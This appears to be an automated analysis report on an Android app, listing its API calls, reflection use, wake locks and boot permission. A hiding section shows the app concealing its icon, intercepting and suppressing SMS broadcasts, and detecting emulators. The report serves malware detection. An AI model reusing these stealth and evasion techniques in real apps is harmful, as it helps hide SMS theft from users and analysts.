Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest com.MrXnxVip.global.httpjob._vvvvvvvvv1
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse com.MrXnxVip.global.httpjob._vvvvvvvvv2
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public java.lang.Object com.MrXnxVip.global.httpjob._vvvvvvvvv3
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public java.lang.String com.MrXnxVip.global.httpjob._vvvvvvvvv4
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public java.lang.String com.MrXnxVip.global.httpjob._vvvvvvvvv5
Source: anywheresoftware.b4a.keywords.Common;->getComponentBA:463API Call: Real call: public static anywheresoftware.b4a.BA com.MrXnxVip.global.main.processBA
Source: anywheresoftware.b4a.keywords.Common$12;->run:38API Call: Real call: public static boolean com.MrXnxVip.global.main.isAnyActivityVisible()
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public java.lang.String com.MrXnxVip.global.httpjob._vvvvvvvv0
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public boolean com.MrXnxVip.global.httpjob._vvvvvvvv3
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse com.MrXnxVip.global.httpjob._vvvvvvvvv2
Source: anywheresoftware.b4a.objects.ServiceHelper$StarterHelper;->startServiceFromReceiver:105API Call: Real call: public static boolean com.MrXnxVip.global.main.isAnyActivityVisible()
Source: com.MrXnxVip.global.pnservices;->onCreate:186API Call: Real call: public static void com.MrXnxVip.global.main.initializeProcessGlobals()
Source: anywheresoftware.b4j.object.JavaObject;->InitializeContext:117API Call: Real call: public final anywheresoftware.b4a.BA$SharedProcessBA anywheresoftware.b4a.BA.sharedProcessBA
Source: anywheresoftware.b4j.object.JavaObject;->InitializeContext:121API Call: Real call: public java.lang.ref.WeakReference anywheresoftware.b4a.BA$SharedProcessBA.activityBA
Source: anywheresoftware.b4j.object.JavaObject;->InitializeContext:127API Call: Real call: public final android.content.Context anywheresoftware.b4a.BA.context
Source: anywheresoftware.b4j.object.JavaObject;->RunMethod:151API Call: Real call: public java.lang.String com.MrXnxVip.global.newmessage1.GET(java.lang.String,android.content.Intent)
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public java.lang.String com.MrXnxVip.global.httpjob._vvvvvvvv0
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public java.lang.String com.MrXnxVip.global.httpjob._vvvvvvvv2
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public boolean com.MrXnxVip.global.httpjob._vvvvvvvv3
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public java.lang.Object com.MrXnxVip.global.httpjob._vvvvvvvv7
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public com.MrXnxVip.global.firebasemessaging com.MrXnxVip.global.httpjob._vvvvvvvvv0
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest com.MrXnxVip.global.httpjob._vvvvvvvvv1
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse com.MrXnxVip.global.httpjob._vvvvvvvvv2
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public java.lang.Object com.MrXnxVip.global.httpjob._vvvvvvvvv3
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public java.lang.String com.MrXnxVip.global.httpjob._vvvvvvvvv4
Source: anywheresoftware.b4a.keywords.Common$12;->run:17API Call: Real call: public java.lang.String com.MrXnxVip.global.httpjob._vvvvvvvvv5
Source: com.google.android.gms.dynamic.ObjectWrapper;->unwrap:10API Call: Real call: private final java.lang.Object com.google.android.gms.dynamic.ObjectWrapper.a
Source: anywheresoftware.b4a.BA;-><init>:32API Call: Real call: public void anywheresoftware.b4a.remotelogger.RemoteLogger.Start()
Source: com.MrXnxVip.global.httpjob;->innerInitialize:9API Call: Real call: java.lang.reflect.Field@722cfa6
Source: com.MrXnxVip.global.httpjob;->innerInitialize:9API Call: Real call: java.lang.reflect.Field@72ce03d
Source: com.MrXnxVip.global.httpjob;->innerInitialize:9API Call: Real call: java.lang.reflect.Field@119e2
Source: anywheresoftware.b4a.keywords.Common;->getComponentBA:463API Call: Real call: public static anywheresoftware.b4a.BA com.MrXnxVip.global.firebasemessaging.processBA
Source: com.MrXnxVip.global.httpjob;->innerInitialize:21API Call: Real call: java.lang.reflect.Field@c381b0b
Source: com.MrXnxVip.global.httpjob;->innerInitialize:21API Call: Real call: java.lang.reflect.Field@a19cc01
Source: com.MrXnxVip.global.httpjob;->innerInitialize:21API Call: Real call: java.lang.reflect.Field@456273d
Source: com.MrXnxVip.global.httpjob;->innerInitialize:21API Call: Real call: java.lang.reflect.Field@d66e083
Source: com.MrXnxVip.global.httpjob;->innerInitialize:21API Call: Real call: java.lang.reflect.Field@587b200
Source: com.MrXnxVip.global.httpjob;->innerInitialize:21API Call: Real call: java.lang.reflect.Field@d98187e
Source: com.MrXnxVip.global.httpjob;->innerInitialize:21API Call: Real call: java.lang.reflect.Field@1b5ee2c
Source: com.MrXnxVip.global.httpjob;->innerInitialize:21API Call: Real call: java.lang.reflect.Field@8993e8a
Source: com.MrXnxVip.global.httpjob;->innerInitialize:21API Call: Real call: java.lang.reflect.Field@1a9c118
Source: anywheresoftware.b4a.BA;->raiseEvent2:408API Call: Real call: public java.lang.String com.MrXnxVip.global.httpjob._class_globals() throws java.lang.Exception
Source: anywheresoftware.b4a.keywords.Common;->getComponentBA:463API Call: Real call: public static anywheresoftware.b4a.BA com.MrXnxVip.global.starter.processBA
Source: anywheresoftware.b4a.BA;->raiseEvent2:408API Call: Real call: public static boolean com.MrXnxVip.global.starter._application_error(anywheresoftware.b4a.objects.B4AException,java.lang.String) throws java.lang.Exception
Source: com.MrXnxVip.global.httpjob;->innerInitialize:18API Call: java.lang.reflect.Method.invoke
Source: com.MrXnxVip.global.main;->onCreateOptionsMenu:155API Call: java.lang.reflect.Method.invoke
Source: com.MrXnxVip.global.main;->onCreateOptionsMenu:157API Call: java.lang.reflect.Method.invoke
Source: com.MrXnxVip.global.main;->onCreateOptionsMenu:175API Call: java.lang.reflect.Method.invoke
Source: androidx.activity.ImmLeaksCleaner;->onStateChanged:17API Call: java.lang.reflect.Field.get
Source: androidx.activity.ImmLeaksCleaner;->onStateChanged:19API Call: java.lang.reflect.Field.get
Source: okhttp3.internal.platform.android.AndroidSocketAdapter;->configureTlsExtensions:29API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.android.AndroidSocketAdapter;->configureTlsExtensions:31API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.android.AndroidSocketAdapter;->configureTlsExtensions:35API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.android.AndroidSocketAdapter;->getSelectedProtocol:42API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.android.CloseGuard;->createAndOpen:6API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.android.CloseGuard;->createAndOpen:9API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.android.CloseGuard;->warnIfOpen:12API Call: java.lang.reflect.Method.invoke
Source: androidx.core.app.ActivityRecreator$3;->run:8API Call: java.lang.reflect.Method.invoke
Source: androidx.core.app.ActivityRecreator$3;->run:13API Call: java.lang.reflect.Method.invoke
Source: androidx.core.app.ActivityRecreator;->queueOnStopIfNecessary:38API Call: java.lang.reflect.Field.get
Source: androidx.core.app.ActivityRecreator;->queueOnStopIfNecessary:41API Call: java.lang.reflect.Field.get
Source: androidx.core.app.ActivityRecreator;->recreate:54API Call: java.lang.reflect.Field.get
Source: androidx.core.app.ActivityRecreator;->recreate:56API Call: java.lang.reflect.Field.get
Source: androidx.core.app.ActivityRecreator;->recreate:69API Call: java.lang.reflect.Method.invoke
Source: androidx.core.app.BundleCompat$BundleCompatBaseImpl;->getBinder:9API Call: java.lang.reflect.Method.invoke
Source: androidx.core.app.BundleCompat$BundleCompatBaseImpl;->putBinder:19API Call: java.lang.reflect.Method.invoke
Source: androidx.core.app.NotificationCompatJellybean;->getAction:52API Call: java.lang.reflect.Field.get
Source: androidx.core.app.NotificationCompatJellybean;->getAction:54API Call: java.lang.reflect.Field.get
Source: androidx.core.app.NotificationCompatJellybean;->getActionObjectsLocked:86API Call: java.lang.reflect.Field.get
Source: androidx.core.app.NotificationCompatJellybean;->getExtras:134API Call: java.lang.reflect.Field.get
Source: androidx.core.app.NotificationManagerCompat;->areNotificationsEnabled:49API Call: java.lang.reflect.Field.get
Source: androidx.core.app.NotificationManagerCompat;->areNotificationsEnabled:53API Call: java.lang.reflect.Method.invoke
Source: anywheresoftware.b4a.BA;->TypeToString:117API Call: java.lang.reflect.Field.get
Source: anywheresoftware.b4a.BA;->isAnyActivityVisible:186API Call: java.lang.reflect.Method.invoke
Source: anywheresoftware.b4a.Msgbox;->dismiss:31API Call: java.lang.reflect.Method.invoke
Source: anywheresoftware.b4a.Msgbox;->recycle:62API Call: java.lang.reflect.Method.invoke
Source: anywheresoftware.b4a.Msgbox;->waitForMessage:89API Call: java.lang.reflect.Method.invoke
Source: anywheresoftware.b4a.BA;->raiseEvent2:440API Call: java.lang.reflect.Method.invoke
Source: anywheresoftware.b4a.BA;->runHook:468API Call: java.lang.reflect.Method.invoke
Source: anywheresoftware.b4a.objects.collections.List$2;->compare:3API Call: java.lang.reflect.Field.get
Source: anywheresoftware.b4a.objects.collections.List$2;->compare:6API Call: java.lang.reflect.Field.get
Source: anywheresoftware.b4a.objects.collections.List$2;->compare:10API Call: java.lang.reflect.Field.get
Source: anywheresoftware.b4a.objects.collections.List$2;->compare:12API Call: java.lang.reflect.Field.get
Source: com.reza.sh.deviceinfo.DiviceInfo$PhoneCustomStateListener;->onSignalStrengthsChanged:7API Call: java.lang.reflect.Method.invoke
Source: com.reza.sh.deviceinfo.DiviceInfo;->getPsuedoUniqueID:455API Call: java.lang.reflect.Field.get
Source: androidx.core.graphics.drawable.DrawableCompat;->getLayoutDirection:25API Call: java.lang.reflect.Method.invoke
Source: androidx.core.graphics.drawable.DrawableCompat;->setLayoutDirection:46API Call: java.lang.reflect.Method.invoke
Source: androidx.core.graphics.drawable.IconCompat;->getResId:124API Call: java.lang.reflect.Method.invoke
Source: androidx.core.graphics.drawable.IconCompat;->getResPackage:135API Call: java.lang.reflect.Method.invoke
Source: androidx.core.graphics.drawable.IconCompat;->getType:155API Call: java.lang.reflect.Method.invoke
Source: androidx.core.graphics.drawable.IconCompat;->getUri:178API Call: java.lang.reflect.Method.invoke
Source: androidx.core.graphics.drawable.WrappedDrawableApi21;->isProjected:19API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.dynamite.DynamiteModule;->getLocalVersion:34API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.internal.firebase_messaging.zzt;-><clinit>:5API Call: java.lang.reflect.Field.get
Source: androidx.core.graphics.TypefaceCompatApi21Impl;->addFontWeightStyle:6API Call: java.lang.reflect.Method.invoke
Source: androidx.core.graphics.TypefaceCompatApi21Impl;->createFromFamiliesWithDefault:14API Call: java.lang.reflect.Method.invoke
Source: androidx.core.graphics.TypefaceCompatApi24Impl;->addFontWeightStyle:22API Call: java.lang.reflect.Method.invoke
Source: androidx.core.graphics.TypefaceCompatApi24Impl;->createFromFamiliesWithDefault:28API Call: java.lang.reflect.Method.invoke
Source: androidx.core.graphics.TypefaceCompatApi26Impl;->abortCreation:19API Call: java.lang.reflect.Method.invoke
Source: androidx.core.graphics.TypefaceCompatApi28Impl;->createFromFamiliesWithDefault:9API Call: java.lang.reflect.Method.invoke
Source: androidx.core.graphics.TypefaceCompatApi26Impl;->addFontFromAssetManager:27API Call: java.lang.reflect.Method.invoke
Source: androidx.core.graphics.TypefaceCompatApi26Impl;->addFontFromBuffer:33API Call: java.lang.reflect.Method.invoke
Source: androidx.core.graphics.TypefaceCompatApi26Impl;->freeze:36API Call: java.lang.reflect.Method.invoke
Source: androidx.core.graphics.TypefaceCompatApi26Impl;->createFromFamiliesWithDefault:51API Call: java.lang.reflect.Method.invoke
Source: androidx.core.graphics.TypefaceCompatBaseImpl;->getUniqueKey:18API Call: java.lang.reflect.Field.get
Source: kotlin.coroutines.jvm.internal.DebugMetadataKt;->getLabel:19API Call: java.lang.reflect.Field.get
Source: kotlin.coroutines.jvm.internal.ModuleNameRetriever;->getModuleName:27API Call: java.lang.reflect.Method.invoke
Source: kotlin.coroutines.jvm.internal.ModuleNameRetriever;->getModuleName:29API Call: java.lang.reflect.Method.invoke
Source: kotlin.coroutines.jvm.internal.ModuleNameRetriever;->getModuleName:31API Call: java.lang.reflect.Method.invoke
Source: kotlin.internal.PlatformImplementations;->addSuppressed:7API Call: java.lang.reflect.Method.invoke
Source: kotlin.internal.PlatformImplementations;->getSuppressed:18API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.Util;->readFieldOrNull:314API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.measurement.internal.zzae;->zzB:11API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.measurement.internal.zzea;->zzh:285API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.measurement.internal.zzea;->zzh:288API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.measurement.internal.zzhn;->zzu:865API Call: java.lang.reflect.Method.invoke
Source: anywheresoftware.b4a.keywords.Common;->CallSubDebug:63API Call: java.lang.reflect.Method.invoke
Source: anywheresoftware.b4a.keywords.Common;->CallSubDebug2:68API Call: java.lang.reflect.Method.invoke
Source: anywheresoftware.b4a.keywords.Common;->CallSubDebug3:73API Call: java.lang.reflect.Method.invoke
Source: anywheresoftware.b4a.keywords.DesignerArgs;->callsub:25API Call: java.lang.reflect.Method.invoke
Source: androidx.lifecycle.ClassesInfoCache$MethodReference;->invokeCallback:12API Call: java.lang.reflect.Method.invoke
Source: androidx.lifecycle.ClassesInfoCache$MethodReference;->invokeCallback:14API Call: java.lang.reflect.Method.invoke
Source: androidx.lifecycle.ClassesInfoCache$MethodReference;->invokeCallback:16API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.measurement.AppMeasurement;->getInstance:11API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.measurement.zzfz;-><clinit>:5API Call: java.lang.reflect.Field.get
Source: com.google.android.gms.internal.measurement.zzg;->zza:21API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.measurement.zzg;->zza:32API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.measurement.zzhm;->zzb:49API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.measurement.zzhs;->zzbA:4API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.measurement.zzip;-><init>:7API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.internal.measurement.zzkc;->zza:4API Call: java.lang.reflect.Field.get
Source: anywheresoftware.b4a.objects.ActivityWrapper;->build:54API Call: java.lang.reflect.Method.invoke
Source: anywheresoftware.b4j.object.JavaObject;->GetField:105API Call: java.lang.reflect.Field.get
Source: anywheresoftware.b4a.objects.ActivityWrapper;->RerunDesignerScript:110API Call: java.lang.reflect.Field.get
Source: anywheresoftware.b4a.objects.B4XViewWrapper;->getColor:226API Call: java.lang.reflect.Field.get
Source: anywheresoftware.b4a.objects.ButtonWrapper;->removeCaps:17API Call: java.lang.reflect.Method.invoke
Source: anywheresoftware.b4a.objects.CustomViewWrapper;->AfterDesignerScript:95API Call: java.lang.reflect.Method.invoke
Source: anywheresoftware.b4a.objects.EditTextWrapper;->build:26API Call: java.lang.reflect.Field.get
Source: anywheresoftware.b4a.objects.NotificationWrapper;->SetInfo2New:65API Call: java.lang.reflect.Method.invoke
Source: anywheresoftware.b4a.objects.NotificationListenerWrapper;->onStartCommand:60API Call: java.lang.reflect.Method.invoke
Source: anywheresoftware.b4a.objects.NotificationListenerWrapper;->onStartCommand:64API Call: java.lang.reflect.Method.invoke
Source: anywheresoftware.b4a.objects.PanelWrapper;->build:17API Call: java.lang.reflect.Method.invoke
Source: anywheresoftware.b4a.objects.PanelWrapper;->getElevation:60API Call: java.lang.reflect.Method.invoke
Source: anywheresoftware.b4a.objects.PanelWrapper;->setElevation:83API Call: java.lang.reflect.Method.invoke
Source: anywheresoftware.b4a.objects.TextViewWrapper;->build:35API Call: java.lang.reflect.Field.get
Source: anywheresoftware.b4a.objects.TextViewWrapper;->build:41API Call: java.lang.reflect.Field.get
Source: anywheresoftware.b4a.objects.TextViewWrapper;->build:51API Call: java.lang.reflect.Field.get
Source: anywheresoftware.b4a.objects.TextViewWrapper;->build:56API Call: java.lang.reflect.Field.get
Source: anywheresoftware.b4a.objects.ViewWrapper;->findRadius:111API Call: java.lang.reflect.Field.get
Source: anywheresoftware.b4a.objects.ViewWrapper;->findRadius:115API Call: java.lang.reflect.Field.get
Source: androidx.core.os.TraceCompat;->beginAsyncSection:27API Call: java.lang.reflect.Method.invoke
Source: androidx.core.os.TraceCompat;->endAsyncSection:36API Call: java.lang.reflect.Method.invoke
Source: androidx.core.os.TraceCompat;->isEnabled:44API Call: java.lang.reflect.Method.invoke
Source: androidx.core.os.TraceCompat;->setCounter:53API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.AndroidPlatform$CustomTrustRootIndex;->findByIssuerAndSignature:26API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.Jdk8WithJettyBootPlatform$AlpnProvider;->invoke:44API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.Jdk8WithJettyBootPlatform;->afterHandshake:17API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.Jdk8WithJettyBootPlatform;->configureTlsExtensions:33API Call: java.lang.reflect.Method.invoke
Source: okhttp3.internal.platform.Jdk8WithJettyBootPlatform;->getSelectedProtocol:40API Call: java.lang.reflect.Method.invoke
Source: androidx.core.content.pm.ShortcutManagerCompat;->getShortcutInfoSaverInstance:38API Call: java.lang.reflect.Method.invoke
Source: anywheresoftware.b4a.agraham.reflection.Reflection;->runmethod:18API Call: java.lang.reflect.Method.invoke
Source: anywheresoftware.b4a.agraham.reflection.Reflection;->GetField:92API Call: java.lang.reflect.Field.get
Source: anywheresoftware.b4a.agraham.reflection.Reflection;->GetField2:95API Call: java.lang.reflect.Field.get
Source: anywheresoftware.b4a.agraham.reflection.Reflection;->GetMostCurrent:124API Call: java.lang.reflect.Field.get
Source: anywheresoftware.b4a.agraham.reflection.Reflection;->GetProcessBA:139API Call: java.lang.reflect.Field.get
Source: anywheresoftware.b4a.agraham.reflection.Reflection;->GetPublicField:149API Call: java.lang.reflect.Field.get
Source: anywheresoftware.b4a.agraham.reflection.Reflection;->GetStaticField:156API Call: java.lang.reflect.Field.get
Source: anywheresoftware.b4a.agraham.reflection.Reflection;->InvokeMethod:158API Call: java.lang.reflect.Method.invoke
Source: anywheresoftware.b4a.agraham.reflection.Reflection;->RunPublicmethod:175API Call: java.lang.reflect.Method.invoke
Source: anywheresoftware.b4a.agraham.reflection.Reflection;->RunStaticMethod:183API Call: java.lang.reflect.Method.invoke
Source: androidx.core.content.res.ResourcesCompat$ThemeCompat$ImplApi23;->rebase:12API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.security.ProviderInstaller;->installIfNeeded:33API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.security.ProviderInstaller;->zzb:63API Call: java.lang.reflect.Method.invoke
Source: androidx.core.text.ICUCompat;->addLikelySubtags:17API Call: java.lang.reflect.Method.invoke
Source: androidx.core.text.ICUCompat;->getScript:23API Call: java.lang.reflect.Method.invoke
Source: androidx.core.text.ICUCompat;->maximizeAndGetScript:31API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.common.util.WorkSourceUtil;->fromPackageAndModuleExperimentalPi:65API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.common.util.WorkSourceUtil;->fromPackageAndModuleExperimentalPi:68API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.common.util.WorkSourceUtil;->fromPackageAndModuleExperimentalPi:71API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.common.util.WorkSourceUtil;->getNames:81API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.common.util.WorkSourceUtil;->getNames:87API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.common.util.WorkSourceUtil;->zza:101API Call: java.lang.reflect.Method.invoke
Source: com.google.android.gms.common.util.WorkSourceUtil;->zza:105API Call: java.lang.reflect.Method.invoke
Source: androidx.versionedparcelable.VersionedParcel;->readFromParcel:194API Call: java.lang.reflect.Method.invoke
Source: androidx.versionedparcelable.VersionedParcel;->writeToParcel:401API Call: java.lang.reflect.Method.invoke
Source: androidx.core.view.DisplayCompat;->getSystemProperty:30API Call: java.lang.reflect.Method.invoke
Source: androidx.core.view.KeyEventDispatcher;->actionBarOnMenuKeyEventPre28:6API Call: java.lang.reflect.Method.invoke
Source: androidx.core.view.KeyEventDispatcher;->getDialogKeyListenerPre28:38API Call: java.lang.reflect.Field.get
Source: androidx.core.view.ViewCompat;->dispatchFinishTemporaryDetach:63API Call: java.lang.reflect.Method.invoke
Source: androidx.core.view.ViewCompat;->dispatchStartTemporaryDetach:85API Call: java.lang.reflect.Method.invoke
Source: androidx.core.view.ViewCompat;->getAccessibilityDelegateThroughReflection:110API Call: java.lang.reflect.Field.get
Source: androidx.core.view.ViewCompat;->getMinimumHeight:160API Call: java.lang.reflect.Field.get
Source: androidx.core.view.ViewCompat;->getMinimumWidth:167API Call: java.lang.reflect.Field.get
Source: androidx.core.view.ViewCompat;->setChildrenDrawingOrderEnabled:399API Call: java.lang.reflect.Method.invoke
Source: androidx.core.view.ViewConfigurationCompat;->getLegacyScrollFactor:8API Call: java.lang.reflect.Method.invoke
Source: androidx.core.view.WindowInsetsCompat$BuilderImpl20;->createWindowInsetsInstance:11API Call: java.lang.reflect.Field.get
Source: androidx.core.widget.CompoundButtonCompat;->getButtonDrawable:10API Call: java.lang.reflect.Field.get
Source: androidx.core.widget.PopupWindowCompat;->getOverlapAnchor:10API Call: java.lang.reflect.Field.get
Source: androidx.core.widget.PopupWindowCompat;->getWindowLayoutType:19API Call: java.lang.reflect.Method.invoke
Source: androidx.core.widget.PopupWindowCompat;->setWindowLayoutType:40API Call: java.lang.reflect.Method.invoke
Source: androidx.core.widget.TextViewCompat$OreoCallback;->recomputeProcessTextMenuItems:58API Call: java.lang.reflect.Method.invoke
Source: androidx.core.content.pm.ShortcutInfoCompat;->addToIntent:32API Call: android.content.Intent.putExtra android.intent.extra.shortcut.INTENT
Source: androidx.core.app.JobIntentService$CompatWorkEnqueuer;-><init>:11API Call: android.os.PowerManager.newWakeLock
Source: androidx.core.app.JobIntentService$CompatWorkEnqueuer;-><init>:19API Call: android.os.PowerManager.newWakeLock
Source: androidx.legacy.content.WakefulBroadcastReceiver;->startWakefulService:30API Call: android.os.PowerManager.newWakeLock
Source: com.google.firebase.messaging.SyncTask;-><init>:11API Call: android.os.PowerManager.newWakeLock
Source: com.google.firebase.messaging.TopicsSyncTask;-><init>:6API Call: android.os.PowerManager.newWakeLock
Source: anywheresoftware.b4a.objects.ServiceHelper$StarterHelper;->startServiceFromReceiver:114API Call: android.os.PowerManager.newWakeLock
Source: anywheresoftware.b4a.phone.Phone$PhoneWakeState;->KeepAlive:10API Call: android.os.PowerManager.newWakeLock
Source: anywheresoftware.b4a.phone.Phone$PhoneWakeState;->PartialLock:20API Call: android.os.PowerManager.newWakeLock
Source: com.google.android.gms.stats.WakeLock;-><init>:25API Call: android.os.PowerManager.newWakeLock
Source: submitted apkRequest permission: android.permission.RECEIVE_BOOT_COMPLETED

Hooking and other Techniques for Hiding and Protection

barindex
Source: com.MrXnxVip.global.firebasemessaging;->hideAppIcon:193API Call: android.content.pm.PackageManager.setComponentEnabledSetting
Source: com.google.firebase.messaging.DisplayNotification;->isAppForeground:12API Call: android.app.ActivityManager.getRunningAppProcesses
Source: anywheresoftware.b4a.phone.PhoneEvents$SMSInterceptor$2;->onReceive:21API Call: anywheresoftware.b4a.phone.PhoneEvents$SMSInterceptor$2.abortBroadcast
Source: com.google.firebase.messaging.GmsRpc;->getHashedFirebaseAppName:12API Call: java.security.MessageDigest.getInstance
Source: com.google.firebase.messaging.GmsRpc;->setDefaultAttributesToBundle:78API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.common.util.AndroidUtilsLight;->zza:14API Call: java.security.MessageDigest.getInstance
Source: com.google.firebase.installations.remote.FirebaseInstallationServiceClient;->getFingerprintHashForPackage:39API Call: java.security.MessageDigest.digest
Source: com.google.firebase.messaging.GmsRpc;->setDefaultAttributesToBundle:78API Call: java.security.MessageDigest.digest
Source: com.google.firebase.messaging.GmsRpc;->setDefaultAttributesToBundle:78API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.common.zzw;->zzg:13API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.measurement.internal.zzea;->zzh:247API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.measurement.internal.zzjc;->zzf:46API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.measurement.internal.zzkf;->zzr:726API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.measurement.internal.zzkk;->zzN:8API Call: java.security.MessageDigest.getInstance
Source: com.google.firebase.installations.local.IidStore;->getIdFromPublicKey:32API Call: java.security.MessageDigest.getInstance
Source: com.google.firebase.installations.local.IidStore;->getIdFromPublicKey:33API Call: java.security.MessageDigest.digest
Source: com.google.firebase.messaging.GmsRpc;->getHashedFirebaseAppName:14API Call: java.security.MessageDigest.digest
Source: anywheresoftware.b4h.okhttp.OkHttpClientWrapper$B4AAuthenticator;->handleDigest:21API Call: java.security.MessageDigest.getInstance
Source: anywheresoftware.b4h.okhttp.OkHttpClientWrapper$B4AAuthenticator;->handleDigest:34API Call: java.security.MessageDigest.digest
Source: anywheresoftware.b4h.okhttp.OkHttpClientWrapper$B4AAuthenticator;->handleDigest:45API Call: java.security.MessageDigest.digest
Source: anywheresoftware.b4h.okhttp.OkHttpClientWrapper$B4AAuthenticator;->handleDigest:59API Call: java.security.MessageDigest.digest
Source: anywheresoftware.b4h.okhttp.OkHttpClientWrapper$B4AAuthenticator;->handleDigest:75API Call: java.security.MessageDigest.digest
Source: okio.Buffer;->digest:5API Call: java.security.MessageDigest.getInstance
Source: okio.Buffer;->digest:8API Call: java.security.MessageDigest.update
Source: okio.Buffer;->digest:12API Call: java.security.MessageDigest.update
Source: okio.Buffer;->digest:15API Call: java.security.MessageDigest.digest
Source: okio.ByteString;->digest$okio:76API Call: java.security.MessageDigest.getInstance
Source: okio.ByteString;->digest$okio:78API Call: java.security.MessageDigest.digest
Source: okio.HashingSink;-><init>:7API Call: java.security.MessageDigest.getInstance
Source: okio.HashingSink;->hash:37API Call: java.security.MessageDigest.digest
Source: okio.HashingSink;->write:53API Call: java.security.MessageDigest.update
Source: okio.HashingSource;-><init>:7API Call: java.security.MessageDigest.getInstance
Source: okio.HashingSource;->hash:37API Call: java.security.MessageDigest.digest
Source: okio.HashingSource;->read:56API Call: java.security.MessageDigest.update
Source: okio.SegmentedByteString;->digest$okio:24API Call: java.security.MessageDigest.getInstance
Source: okio.SegmentedByteString;->digest$okio:29API Call: java.security.MessageDigest.update
Source: okio.SegmentedByteString;->digest$okio:30API Call: java.security.MessageDigest.digest
Source: com.google.android.gms.common.util.AndroidUtilsLight;->getPackageCertificateHashBytes:13API Call: java.security.MessageDigest.digest
Source: Lcom/reza/sh/deviceinfo/DiviceInfo;->isRunningOnEmulator()ZMethod string: "vbox86p"
Source: Lcom/reza/sh/deviceinfo/DiviceInfo;->isRunningOnEmulator()ZMethod string: "vbox86p"
Source: Lcom/reza/sh/deviceinfo/DiviceInfo;->isRunningOnEmulator()ZMethod string: "vbox86"
Source: com.google.firebase.FirebaseCommonRegistrar;->getComponents:45Field Access: android.os.Build.PRODUCT
Source: com.google.firebase.FirebaseCommonRegistrar;->getComponents:50Field Access: android.os.Build.DEVICE
Source: com.google.firebase.FirebaseCommonRegistrar;->getComponents:55Field Access: android.os.Build.BRAND
Source: com.MrXnxVip.global.firebasemessaging$ResumableSub_Service_Start;->resume:53Field Access: android.os.Build.MANUFACTURER
Source: com.MrXnxVip.global.firebasemessaging$ResumableSub_Service_Start;->resume:55Field Access: android.os.Build.MODEL
Source: com.MrXnxVip.global.newmessage1;->_service_start:52Field Access: android.os.Build.MANUFACTURER
Source: com.MrXnxVip.global.newmessage1;->_service_start:54Field Access: android.os.Build.MODEL
Source: com.google.android.datatransport.cct.CctTransportBackend;->decorate:265Field Access: android.os.Build.MODEL
Source: com.google.android.datatransport.cct.CctTransportBackend;->decorate:271Field Access: android.os.Build.DEVICE
Source: com.google.android.datatransport.cct.CctTransportBackend;->decorate:274Field Access: android.os.Build.PRODUCT
Source: com.google.android.datatransport.cct.CctTransportBackend;->decorate:277Field Access: android.os.Build.ID
Source: com.google.android.datatransport.cct.CctTransportBackend;->decorate:280Field Access: android.os.Build.MANUFACTURER
Source: com.google.android.datatransport.cct.CctTransportBackend;->decorate:283Field Access: android.os.Build.FINGERPRINT
